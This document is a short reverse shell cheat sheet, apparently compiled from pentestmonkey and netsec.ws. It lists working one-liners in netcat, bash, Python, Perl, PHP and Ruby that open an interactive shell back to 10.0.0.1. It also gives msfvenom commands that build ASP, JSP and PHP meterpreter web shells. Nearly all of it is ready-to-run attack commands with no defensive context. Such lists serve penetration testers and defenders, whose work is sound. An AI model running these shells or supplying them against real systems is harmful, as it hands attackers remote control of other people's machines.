Refference : http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

  _____                                    _          _ _     
 |  __ \                                  | |        | | |    
 | |__) |_____   _____ _ __ ___  ___   ___| |__   ___| | |___ 
 |  _  // _ \ \ / / _ \ '__/ __|/ _ \ / __| '_ \ / _ \ | / __|
 | | \ \  __/\ V /  __/ |  \__ \  __/ \__ \ | | |  __/ | \__ \
 |_|  \_\___| \_/ \___|_|  |___/\___| |___/_| |_|\___|_|_|___/
                                                              
                                                              

Netcat 

nc -e /bin/sh 10.0.0.1 1234

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f   **God mode**

Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Php

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


Refference : https://netsec.ws/?p=331
                 __                                 
                / _|                                
  _ __ ___  ___| |___   _____ _ __   ___  _ __ ___  
 | '_ ` _ \/ __|  _\ \ / / _ \ '_ \ / _ \| '_ ` _ \ 
 | | | | | \__ \ |  \ V /  __/ | | | (_) | | | | | |
 |_| |_| |_|___/_|   \_/ \___|_| |_|\___/|_| |_| |_|
                                                    
                                                    
asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
